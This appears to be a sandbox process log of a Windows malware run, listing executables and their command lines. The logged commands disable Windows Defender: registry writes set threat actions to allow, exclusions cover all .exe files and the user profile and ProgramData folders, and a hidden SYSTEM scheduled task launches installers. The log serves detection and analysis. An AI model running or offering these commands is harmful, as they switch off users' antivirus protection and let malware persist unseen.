C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Users\Admin\Pictures\lZ0rs9U9fodbkK0g21NIbnAx.exe
"C:\Users\Admin\Pictures\lZ0rs9U9fodbkK0g21NIbnAx.exe"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Users\Admin\AppData\Local\Temp\7zS3C1A.tmp\Install.exe
.\Install.exe /tEdidDDf "385118" /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Users\Admin\Pictures\gFsnisT4V524tJNo2DqUq6HG.exe
"C:\Users\Admin\Pictures\gFsnisT4V524tJNo2DqUq6HG.exe"
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 19:26:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS2CA9.tmp\Install.exe\" it /HdJdidoshf 385118 /S" /V1 /F
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 19:26:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS3C1A.tmp\Install.exe\" it /NBldidEekR 385118 /S" /V1 /F
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
C:\Users\Admin\AppData\Local\Temp\7zS3C1A.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS3C1A.tmp\Install.exe it /NBldidEekR 385118 /S
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
C:\Users\Admin\AppData\Local\Temp\7zS3C1A.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS3C1A.tmp\Install.exe it /NBldidEekR 385118 /S
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
